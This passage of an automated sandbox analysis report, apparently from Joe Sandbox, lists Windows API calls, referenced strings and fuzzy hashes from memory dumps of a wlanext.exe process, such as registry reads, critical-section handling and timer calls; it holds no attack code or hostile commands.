                                              • Part of subcall function 00FE8DB4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1520,?,00000000,00000001,00FF13CC,?,00FE35F4), ref: 00FE8E1B
                                              • Part of subcall function 00FE8DB4: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1520,?,00000000,00000001,00FF13CC,?,00FE35F4), ref: 00FE8E8D
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                             • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalErrorLastSection$CreateEnterEventHeapInformationLeaveMessageTrace_wtol
                                            • String ID:
                                            • API String ID: 2628779187-0
                                            • Opcode ID: 9394c857f6fd4582bca58dae98e862159982249bca5fa2105bd83aa0eeb3b76c
                                            • Instruction ID: f532798494068ef290635e41c7f3b2055f8b21dea1772063b7d433b3ca057b0b
                                            • Opcode Fuzzy Hash: 9394c857f6fd4582bca58dae98e862159982249bca5fa2105bd83aa0eeb3b76c
                                            • Instruction Fuzzy Hash: B4B1E9329012D5A6DB2A9F12985CB393E57AF403A4739009DE9051F2ABCB63CF43F795
                                            APIs
                                            • GetTickCount64.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00FEEAFE
                                            • GetTickCount64.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00FEEB5F
                                            • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(?), ref: 00FEEC1C
                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?), ref: 00FEECC7
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEECD7
                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00FEED23
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                             • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Count64Tick$CloseErrorFileHandleLastReadSleep
                                            • String ID:
                                            • API String ID: 3641083157-0
                                            • Opcode ID: 7611dfa5c9439b0270ff2366d42aa8de11d00608aa29b2e2c50fa343c56acd2a
                                            • Instruction ID: 5d88111e6077111f9d3198d86d04d61b9f803d35c115acd824ce5fd8f4923b65
                                            • Opcode Fuzzy Hash: 7611dfa5c9439b0270ff2366d42aa8de11d00608aa29b2e2c50fa343c56acd2a
                                            • Instruction Fuzzy Hash: 5A91D271A00385DFDB24DF2AED44B2677E6BF88325F240A2DE442872A1D734E885FB45
                                            APIs
                                            • memset.MSVCRT ref: 00FEDC2A
                                            • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00FEDC37
                                            • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 00FEDC82
                                            • CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(0000000C,00000001,00000000,00000000), ref: 00FEDCCA
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEDCD7
                                              • Part of subcall function 00FEDD04: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00FEDCE6), ref: 00FEDD11
                                              • Part of subcall function 00FEDD04: DeleteCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FEDCE6), ref: 00FEDD21
                                              • Part of subcall function 00FEDD04: DeleteCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FEDCE6), ref: 00FEDD32
                                              • Part of subcall function 00FEDD04: memset.MSVCRT ref: 00FEDD3D
                                            • SetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000), ref: 00FEDCEB
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                             • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$DeleteEventInitializememset$CloseCreateErrorHandleLast
                                            • String ID:
                                            • API String ID: 3741578413-0
                                            • Opcode ID: ec71acfeb0fc8f2cf6072577cf4dc2115ab0f5da3de67221d0cf89a0fae156e1
                                            • Instruction ID: a92e3da1d3486d3b1eca7a7722c1000efa984ad094449b1e3127c409da9de328
                                            • Opcode Fuzzy Hash: ec71acfeb0fc8f2cf6072577cf4dc2115ab0f5da3de67221d0cf89a0fae156e1
                                            • Instruction Fuzzy Hash: FB11B2B2D00708AFD7608FA9ED45BAEB7F5FF48310F200529E202E7290DBB49604EB45
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                             • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction ID: daf670dff254dee4c4a5a7ca50d0e098cfd03f04fe69953a74fdc014430beee7
                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction Fuzzy Hash: FD81EE70E452499EDF28CE68C9917FEBBB2EF47320F1C425AD861A7392C7308851CB54
                                            APIs
                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Wlansvc\IHVExtensibility,00000000,00020019,?), ref: 00FE3244
                                            • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,HandlerTimeout,00000000,?,?,00000004), ref: 00FE32A3
                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00FE331D
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            Strings
                                            • Software\Microsoft\Wlansvc\IHVExtensibility, xrefs: 00FE323A
                                            • HandlerTimeout, xrefs: 00FE329B
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                             • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CloseMessageOpenQueryTraceValue
                                            • String ID: HandlerTimeout$Software\Microsoft\Wlansvc\IHVExtensibility
                                            • API String ID: 3821667754-1486466383
                                            • Opcode ID: 9e98b80c99d6a9fafbfc1161ba5979f1cf682aebb5dc981e3bf26b82253772e2
                                            • Instruction ID: 6ab9182a16deb7a570280bbe848c5b99da13d8f2e9052a8f1fa5bff28ee520b1
                                            • Opcode Fuzzy Hash: 9e98b80c99d6a9fafbfc1161ba5979f1cf682aebb5dc981e3bf26b82253772e2
                                            • Instruction Fuzzy Hash: 0241E5319002C8FFDB258F53880CE697FA9FF45355B15409AE6016B2AACB72CA81FB55
                                            APIs
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1520,00000004,00000000,00000001), ref: 00FE8FF0
                                            • QueueUserWorkItem.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(00FE9110,00000000,00000010,00000008,00000000), ref: 00FE9051
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE905B
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1520), ref: 00FE90D2
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterErrorItemLastLeaveMessageQueueTraceUserWork
                                            • String ID: call table
                                            • API String ID: 1836903735-1857531114
                                            • Opcode ID: a4e7f1221a69e535f0098075e24024cd0a109936c733779a3ca3a419fd92e637
                                            • Instruction ID: cf04d8c1080d9c0c8457ea7230c83d057fdc7e8e0fc05b6844bb96f75f14e0cc
                                            • Opcode Fuzzy Hash: a4e7f1221a69e535f0098075e24024cd0a109936c733779a3ca3a419fd92e637
                                            • Instruction Fuzzy Hash: 1C41F7719043C4ABC72A8F278808F697BA6FF44764F154094EA056B2B6CBF6CD80F765
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$[$]:%u
                                            • API String ID: 48624451-2819853543
                                            • Opcode ID: 4fbfe4d1a18fd94ffb10aa12f303103316e8cd536e8cf8fb00f9b5ad3101d725
                                            • Instruction ID: a142af54146016c9812cb8db1a782c57bdb4a9c471675d0bb168dc4292c7614d
                                            • Opcode Fuzzy Hash: 4fbfe4d1a18fd94ffb10aa12f303103316e8cd536e8cf8fb00f9b5ad3101d725
                                            • Instruction Fuzzy Hash: 4821537AE00619ABCB10DE69DD50AEEBBE8EF44640F08051AEA15D7240E730DE158BA1
                                            APIs
                                              • Part of subcall function 00FEF936: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000057,?,00000000,00FE9DC3,00000000,?,00000000,00000001,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF944
                                            • memset.MSVCRT ref: 00FEF6E8
                                            • memcpy.MSVCRT ref: 00FEF706
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000004,00000000,?,?,SetUnicastCipherAlgorithm,00000000,?), ref: 00FEF72C
                                            • RtlNtStatusToDosError.NTDLL ref: 00FEF740
                                            Strings
                                            • SetUnicastCipherAlgorithm, xrefs: 00FEF6A9
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Error$Last$Statusmemcpymemset
                                            • String ID: SetUnicastCipherAlgorithm
                                            • API String ID: 1706616652-4110488708
                                            • Opcode ID: 551fe0c25d15264f782b24d3a1f709af87aa9d1f6ea8b7139ccc819c28c0fb99
                                            • Instruction ID: 9ea13626bc9b020c9db7bf541adbc26590fb72b503ad2c79a32d0ee846d0e7e0
                                            • Opcode Fuzzy Hash: 551fe0c25d15264f782b24d3a1f709af87aa9d1f6ea8b7139ccc819c28c0fb99
                                            • Instruction Fuzzy Hash: 5A210836A00115BBDB11EB56CC85FAEBBADEF84360F108075E909EB251DB34DE09E790
                                            APIs
                                              • Part of subcall function 00FEF936: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000057,?,00000000,00FE9DC3,00000000,?,00000000,00000001,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF944
                                            • memset.MSVCRT ref: 00FEF456
                                            • memcpy.MSVCRT ref: 00FEF474
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000004,00000000,00000000), ref: 00FEF49C
                                            • RtlNtStatusToDosError.NTDLL ref: 00FEF4B0
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Error$Last$Statusmemcpymemset
                                            • String ID: SetAuthAlgorithm
                                            • API String ID: 1706616652-781480318
                                            • Opcode ID: 3a5bf7b0284067901d98d06faafa35e6af6458edf8055391f2ae3c8ac34c62f8
                                            • Instruction ID: 59776fcb008e10a0402966f3c75a5e8674e48101beeed7d4216eff185144ee23
                                            • Opcode Fuzzy Hash: 3a5bf7b0284067901d98d06faafa35e6af6458edf8055391f2ae3c8ac34c62f8
                                            • Instruction Fuzzy Hash: 3F21D432A00165ABEB14DB15CC45FAFB76CEF80360F108036EA09DB281DB34DD05E7A1
                                            APIs
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1500,00000001,00000000,00000001,00000000,00000000), ref: 00FEA60C
                                            • ChangeTimerQueueTimer.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(00000064,00000064), ref: 00FEA66E
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEA678
                                            • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000014,00000000), ref: 00FEA734
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1500,00000014,00000000), ref: 00FEA782
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSectionTimer$ChangeCountEnterErrorLastLeaveMessageQueueTickTrace
                                            • String ID:
                                            • API String ID: 3417154314-0
                                            • Opcode ID: 5dc55c7a1ee60013a1afa5bd71ef078f6a89243cc1ecdb5fe203be8cb779ce64
                                            • Instruction ID: a5f008f13cc7e1a2ff3a51d25136e29477f12b4ca74ecaa954d4d8a84db5fcf0
                                            • Opcode Fuzzy Hash: 5dc55c7a1ee60013a1afa5bd71ef078f6a89243cc1ecdb5fe203be8cb779ce64
                                            • Instruction Fuzzy Hash: CD51E275A003C4ABD725CF26D848B667FAABF40365F184059F9014B2B6C7B6E880FF56
                                            APIs
                                            • QueueUserWorkItem.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(Function_00003950,00000000,00000010), ref: 00FE39B3
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE39BD
                                            • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(000002C9), ref: 00FE39FF
                                            • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000), ref: 00FE3A06
                                            • ExitProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00FE3A0D
                                              • Part of subcall function 00FE2B8E: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,?,00000004,00000000), ref: 00FE2BA5
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Process$CurrentErrorExitItemLastMessageQueueTerminateTraceUserWork
                                            • String ID:
                                            • API String ID: 2743426024-0
                                            • Opcode ID: a97ca14521997ba414d4a0041e6ae3ab770e061bb1fd4e97378800444be57a2b
                                            • Instruction ID: c3d0a0f08a7a6fb54344333b51240126cebbbbd2242ab174b6e2bef01b3621c6
                                            • Opcode Fuzzy Hash: a97ca14521997ba414d4a0041e6ae3ab770e061bb1fd4e97378800444be57a2b
                                            • Instruction Fuzzy Hash: 87F04C32500288ABD7381B63AC0DFBA3A5DEF00321F200155FA00421E2DFB68981F665
                                            APIs
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00FE1A24,?,00FE9CD7,00000000,?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD4F
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD59
                                            • ResetEvent.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD6F
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD76
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00FE2D17,00000002,00000000,?,?), ref: 00FEDD7D
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$EventReset
                                            • String ID:
                                            • API String ID: 3754699133-0
                                            • Opcode ID: 5577d38af940425ecce94921413d8b23dc5c9618275392611347e36f7b6b1f8e
                                            • Instruction ID: 5b09aa684f42f0db87216a49b7988de9f395fe1f4c04025a838f6005ea7846c6
                                            • Opcode Fuzzy Hash: 5577d38af940425ecce94921413d8b23dc5c9618275392611347e36f7b6b1f8e
                                            • Instruction Fuzzy Hash: F4E0ED72401515AF87A15B15ED4CC6BBB79FF853163104559E10682520DF74A446EB61
                                            Strings
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036602E7
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036602BD
                                            • RTL: Re-Waiting, xrefs: 0366031E
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: fb74887a2a9fc78eebec3c97fa5a555d57ce8f176b0d25e441c8de5a1625b450
                                            • Instruction ID: 8c8660081274d9db243ba058e8693bc83f1f711500be47fd5e1bd0480db85f59
                                            • Opcode Fuzzy Hash: fb74887a2a9fc78eebec3c97fa5a555d57ce8f176b0d25e441c8de5a1625b450
                                            • Instruction Fuzzy Hash: B6E1DC316087419FD725CF28C984B2AB7E4BF88364F180A6DF4A68B3E1D774D865CB42
                                            Strings
                                            • RTL: Resource at %p, xrefs: 03667B8E
                                            • RTL: Re-Waiting, xrefs: 03667BAC
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03667B7F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: 3d833a88ae1c224af798c20e2d3ee2b03f0dffbfce5f6ac9d4b0cf9ec6b9d18d
                                            • Instruction ID: f421235d491ea6c7b9dedb07e573fe8e39b9ed85bd8f6ceb45a946eb104208b2
                                            • Opcode Fuzzy Hash: 3d833a88ae1c224af798c20e2d3ee2b03f0dffbfce5f6ac9d4b0cf9ec6b9d18d
                                            • Instruction Fuzzy Hash: 60410435700B029FC724DE69D940B6ABBE5EF88720F040A1DF86ADB780DB71E8058F95
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0366728C
                                            Strings
                                            • RTL: Resource at %p, xrefs: 036672A3
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03667294
                                            • RTL: Re-Waiting, xrefs: 036672C1
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: 57d750ae9afe29a688e8cdbf6f1dcfd573f5a066fe070f32d155a5cd342ab00f
                                            • Instruction ID: 92ca954192f2afbfd97f1d2edbacb480db99f6e738af1f88ef2e3b988c015734
                                            • Opcode Fuzzy Hash: 57d750ae9afe29a688e8cdbf6f1dcfd573f5a066fe070f32d155a5cd342ab00f
                                            • Instruction Fuzzy Hash: D5411F35600716AFC720DE24CC81F6ABBA9FF84754F180619FC56AB340DB20F8428BE9
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: 4c31343ad00b16de19608f4a162cd98fe1092e1e6b57b18579bffb0c28626214
                                            • Instruction ID: 66b05c2e649751b407856b1bea2ae768918a54662826ec4576ad13021498e9a9
                                            • Opcode Fuzzy Hash: 4c31343ad00b16de19608f4a162cd98fe1092e1e6b57b18579bffb0c28626214
                                            • Instruction Fuzzy Hash: A3318676A006299FCB24DE2DDD50BEFB7F8EF45610F440559E849E7240EB309E448FA0
                                            APIs
                                              • Part of subcall function 00FEF936: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000057,?,00000000,00FE9DC3,00000000,?,00000000,00000001,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF944
                                            • memcpy.MSVCRT ref: 00FEF8BD
                                            • memcpy.MSVCRT ref: 00FEF8DB
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,-0000001C,00000000,00000004,00000000,?,00000000,00000003,00000000,?,00000000), ref: 00FEF903
                                            • RtlNtStatusToDosError.NTDLL ref: 00FEF917
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Error$Lastmemcpy$Status
                                            • String ID:
                                            • API String ID: 3124673191-0
                                            • Opcode ID: 919e4d658d883932da5587241ea444c587a0cb8db1ba8c6083198de8824e591e
                                            • Instruction ID: d070fbce1095c07228b9dc60fbb0e70caca6b65dbeeb850ed931c66a8199c844
                                            • Opcode Fuzzy Hash: 919e4d658d883932da5587241ea444c587a0cb8db1ba8c6083198de8824e591e
                                            • Instruction Fuzzy Hash: EF31E47290021AABDB00DF59DC81BAEB7B4FF40320F11412AE965E7242D734EE14DBD0
                                            APIs
                                              • Part of subcall function 00FEF936: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000057,?,00000000,00FE9DC3,00000000,?,00000000,00000001,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF944
                                            • memset.MSVCRT ref: 00FEF5F5
                                            • memcpy.MSVCRT ref: 00FEF649
